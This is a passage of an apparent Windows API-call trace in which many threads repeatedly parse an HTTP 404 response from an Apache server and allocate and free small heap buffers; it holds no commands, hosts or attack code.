lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 538 os_tid = 0x1684 [0313.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.219] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.219] GetProcessHeap () returned 0x690000 [0313.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0313.220] GetProcessHeap () returned 0x690000 [0313.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0313.220] GetProcessHeap () returned 0x690000 [0313.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 539 os_tid = 0x1680 [0313.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.360] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.360] GetProcessHeap () returned 0x690000 [0313.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0313.360] GetProcessHeap () returned 0x690000 [0313.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0313.360] GetProcessHeap () returned 0x690000 [0313.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 540 os_tid = 0x1678 [0313.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.529] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.529] GetProcessHeap () returned 0x690000 [0313.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0313.529] GetProcessHeap () returned 0x690000 [0313.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0313.529] GetProcessHeap () returned 0x690000 [0313.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 541 os_tid = 0x167c [0314.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.414] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.414] GetProcessHeap () returned 0x690000 [0314.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0314.414] GetProcessHeap () returned 0x690000 [0314.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0314.414] GetProcessHeap () returned 0x690000 [0314.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 542 os_tid = 0x1770 [0314.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.620] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.620] GetProcessHeap () returned 0x690000 [0314.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0314.620] GetProcessHeap () returned 0x690000 [0314.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0314.620] GetProcessHeap () returned 0x690000 [0314.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 543 os_tid = 0x1788 [0314.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.826] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.826] GetProcessHeap () returned 0x690000 [0314.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0314.828] GetProcessHeap () returned 0x690000 [0314.828] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0314.828] GetProcessHeap () returned 0x690000 [0314.828] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 544 os_tid = 0x1608 [0315.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.035] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.035] GetProcessHeap () returned 0x690000 [0315.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0315.035] GetProcessHeap () returned 0x690000 [0315.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0315.035] GetProcessHeap () returned 0x690000 [0315.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 545 os_tid = 0x15e8 [0315.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.453] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.453] GetProcessHeap () returned 0x690000 [0315.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0315.453] GetProcessHeap () returned 0x690000 [0315.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0315.453] GetProcessHeap () returned 0x690000 [0315.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 546 os_tid = 0xa40 [0315.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.751] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.751] GetProcessHeap () returned 0x690000 [0315.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0315.751] GetProcessHeap () returned 0x690000 [0315.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0315.751] GetProcessHeap () returned 0x690000 [0315.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 547 os_tid = 0x1804 [0316.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.362] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.362] GetProcessHeap () returned 0x690000 [0316.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0316.362] GetProcessHeap () returned 0x690000 [0316.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0316.362] GetProcessHeap () returned 0x690000 [0316.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 548 os_tid = 0x1808 [0316.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.773] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.773] GetProcessHeap () returned 0x690000 [0316.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0316.773] GetProcessHeap () returned 0x690000 [0316.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0316.773] GetProcessHeap () returned 0x690000 [0316.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 549 os_tid = 0x180c [0317.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.564] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.564] GetProcessHeap () returned 0x690000 [0317.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0317.564] GetProcessHeap () returned 0x690000 [0317.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0317.564] GetProcessHeap () returned 0x690000 [0317.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 550 os_tid = 0x1810 [0317.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.928] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.929] GetProcessHeap () returned 0x690000 [0317.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0317.929] GetProcessHeap () returned 0x690000 [0317.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0317.929] GetProcessHeap () returned 0x690000 [0317.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 Thread: id = 551 os_tid = 0x1814 [0318.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.229] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.229] GetProcessHeap () returned 0x690000 [0318.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0318.290] GetProcessHeap () returned 0x690000 [0318.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0318.291] GetProcessHeap () returned 0x690000 [0318.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 552 os_tid = 0x1818 [0318.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.541] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.541] GetProcessHeap () returned 0x690000 [0318.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0318.541] GetProcessHeap () returned 0x690000 [0318.541] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0318.541] GetProcessHeap () returned 0x690000 [0318.542] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 553 os_tid = 0x181c [0318.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.735] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.735] GetProcessHeap () returned 0x690000 [0318.736] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0318.736] GetProcessHeap () returned 0x690000 [0318.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0318.736] GetProcessHeap () returned 0x690000 [0318.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 554 os_tid = 0x1820 [0318.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.975] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.976] GetProcessHeap () returned 0x690000 [0318.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0318.976] GetProcessHeap () returned 0x690000 [0318.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0318.976] GetProcessHeap () returned 0x690000 [0318.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 555 os_tid = 0x1828 [0319.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.208] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.208] GetProcessHeap () returned 0x690000 [0319.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0319.208] GetProcessHeap () returned 0x690000 [0319.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0319.208] GetProcessHeap () returned 0x690000 [0319.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 556 os_tid = 0x182c [0319.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.418] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.418] GetProcessHeap () returned 0x690000 [0319.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0319.418] GetProcessHeap () returned 0x690000 [0319.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0319.418] GetProcessHeap () returned 0x690000 [0319.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 557 os_tid = 0x1830 [0320.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.013] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.013] GetProcessHeap () returned 0x690000 [0320.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0320.013] GetProcessHeap () returned 0x690000 [0320.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0320.013] GetProcessHeap () returned 0x690000 [0320.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 558 os_tid = 0x1834 [0320.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.184] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.184] GetProcessHeap () returned 0x690000 [0320.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0320.184] GetProcessHeap () returned 0x690000 [0320.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0320.184] GetProcessHeap () returned 0x690000 [0320.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 559 os_tid = 0x1838 [0320.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.354] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.355] GetProcessHeap () returned 0x690000 [0320.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0320.355] GetProcessHeap () returned 0x690000 [0320.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0320.355] GetProcessHeap () returned 0x690000 [0320.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 560 os_tid = 0x1840 [0320.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.779] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.779] GetProcessHeap () returned 0x690000 [0320.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0320.779] GetProcessHeap () returned 0x690000 [0320.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0320.779] GetProcessHeap () returned 0x690000 [0320.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 561 os_tid = 0x1844 [0321.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.034] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.034] GetProcessHeap () returned 0x690000 [0321.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0321.034] GetProcessHeap () returned 0x690000 [0321.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0321.034] GetProcessHeap () returned 0x690000 [0321.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 562 os_tid = 0x1848 [0321.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.222] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.222] GetProcessHeap () returned 0x690000 [0321.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0321.222] GetProcessHeap () returned 0x690000 [0321.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0321.222] GetProcessHeap () returned 0x690000 [0321.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 563 os_tid = 0x184c [0321.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.395] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.395] GetProcessHeap () returned 0x690000 [0321.395] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0321.395] GetProcessHeap () returned 0x690000 [0321.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0321.395] GetProcessHeap () returned 0x690000 [0321.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 564 os_tid = 0x1850 [0321.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.596] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.596] GetProcessHeap () returned 0x690000 [0321.596] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0321.596] GetProcessHeap () returned 0x690000 [0321.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0321.596] GetProcessHeap () returned 0x690000 [0321.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 565 os_tid = 0x1854 [0321.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.811] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.811] GetProcessHeap () returned 0x690000 [0321.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0321.812] GetProcessHeap () returned 0x690000 [0321.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0321.812] GetProcessHeap () returned 0x690000 [0321.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 566 os_tid = 0x1858 [0321.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.999] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.999] GetProcessHeap () returned 0x690000 [0321.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0321.999] GetProcessHeap () returned 0x690000 [0321.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0321.999] GetProcessHeap () returned 0x690000 [0322.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 567 os_tid = 0x185c [0322.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.205] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0322.205] GetProcessHeap () returned 0x690000 [0322.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0322.205] GetProcessHeap () returned 0x690000 [0322.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0322.205] GetProcessHeap () returned 0x690000 [0322.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 568 os_tid = 0x1860 [0322.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.429] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0322.429] GetProcessHeap () returned 0x690000 [0322.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0322.429] GetProcessHeap () returned 0x690000 [0322.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0322.429] GetProcessHeap () returned 0x690000 [0322.429] 